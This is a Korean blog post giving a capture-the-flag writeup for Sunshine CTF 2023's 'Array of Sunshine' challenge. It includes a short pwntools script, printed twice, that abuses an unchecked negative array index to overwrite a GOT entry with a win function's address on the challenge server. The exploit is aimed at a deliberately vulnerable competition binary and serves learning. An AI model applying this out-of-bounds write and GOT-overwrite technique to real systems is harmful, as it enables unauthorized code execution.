[sunshine CTF 2023] Array of Sunshine writeup

2023. 10. 19. 13:50· 시스템해킹
목차
  1. 익스플로잇

from pwn import *

#p = process('./sunshine')
p = remote('chal.2023.sunshinectf.games', 23003)


p.recvuntil(b'>>> ')
p.sendline(b'-9')
p.recvuntil(b'>>>')
p.sendline(p64(0x40128f))
p.interactive()
p.close()

 

sunshine 파일을 실행시키면 요래요래 실행이 된다.

 

 

해당 문제에선 배열에 오렌지 , 사과, 배 , 바나나가 저장이 되어있고, 인덱스에 번호를 입력해서 해당 부분의 값을 바꿀 수 있는 문제이다. 하지만 여기서 인덱스 값이 초과로 입력되도, 해당 부분에 값을 바꿀 수 있다.

따라서 fruits 배열의 위치를 보면0x405080에 존재한다. exit의 got 부분에 win(플레그 출력 함수) 함수의 주소를 넘기면 되지 않을까? 하고 했지만 

하지만 난 바보였다. 한번도 사용되지 않은 got에 씌우면 무슨 의미가 있나.

0x405038에 씌워보자 ㅎ

 

익스플로잇

from pwn import *

#p = process('./sunshine')
p = remote('chal.2023.sunshinectf.games', 23003)


p.recvuntil(b'>>> ')
p.sendline(b'-9')
p.recvuntil(b'>>>')
p.sendline(p64(0x40128f))
p.interactive()
p.close()

 

해결~

'시스템해킹' 카테고리의 다른 글

드림핵 off_by_one_000 writeup  (0) 2023.11.02
SSTF bof101 writeup  (1) 2023.11.02
dreamhack 쉘코드 강의 정리(1)  (1) 2023.10.05
pwnable.kr flag writeup  (0) 2023.10.05
어셈블리에서의 프롤로그  (0) 2023.10.05
  1. 익스플로잇
'시스템해킹' 카테고리의 다른 글
  • 드림핵 off_by_one_000 writeup
  • SSTF bof101 writeup
  • dreamhack 쉘코드 강의 정리(1)
  • pwnable.kr flag writeup
세종대학교 S.S.G / WHS 2기
세종대학교 S.S.G / WHS 2기
이것 저것 다해요
세종대학교 S.S.G / WHS 2기
Barrack의 고군분투
세종대학교 S.S.G / WHS 2기
전체
오늘
어제
  • 분류 전체보기
    • 시스템해킹
    • 웹해킹
    • 포렌식
    • 머신러닝
    • 취약점 정리
    • 정보보호

블로그 메뉴

  • 홈
  • 태그
  • 방명록

공지사항

인기 글

태그

  • IOT
  • 메모리 #스택 #어셈블리
  • 포너블
  • 라업
  • dreamhack
  • 정보보호
  • Gobuster #웹해킹 #kali #linux #칼리 #모의해킹 #웹 #dir
  • 정보보안
  • ROP #offset #x64 #ret #vuln #PIE #gadget #lazenca
  • System
  • dreamhack #드림핵 #웹해킹 #pathtraversal #burpsuite #워게임 #writeup #문제풀이
  • 시스템해킹
  • 해킹
  • SYSTEMHACKING
  • 드림핵
  • Pwnable
  • canari
  • cybersecurity
  • writeup
  • IoT 보안
  • 2023
  • 파이프라이닝
  • rop #movaps #exploit #x64
  • 시스탬해킹
  • 시스템해킹 #lazenca #ROP #x64 #ROP-x64 #취약점
  • Pwnable.kr
  • 라자루스
  • ShellShock
  • hookoverwrite
  • 침해사고

최근 댓글

최근 글

hELLO · Designed By 정상우.v4.2.2
세종대학교 S.S.G / WHS 2기
[sunshine CTF 2023] Array of Sunshine writeup
상단으로

티스토리툴바

단축키

내 블로그

내 블로그 - 관리자 홈 전환
Q
Q
새 글 쓰기
W
W

블로그 게시글

글 수정 (권한 있는 경우)
E
E
댓글 영역으로 이동
C
C

모든 영역

이 페이지의 URL 복사
S
S
맨 위로 이동
T
T
티스토리 홈 이동
H
H
단축키 안내
Shift + /
⇧ + /

* 단축키는 한글/영문 대소문자로 이용 가능하며, 티스토리 기본 도메인에서만 동작합니다.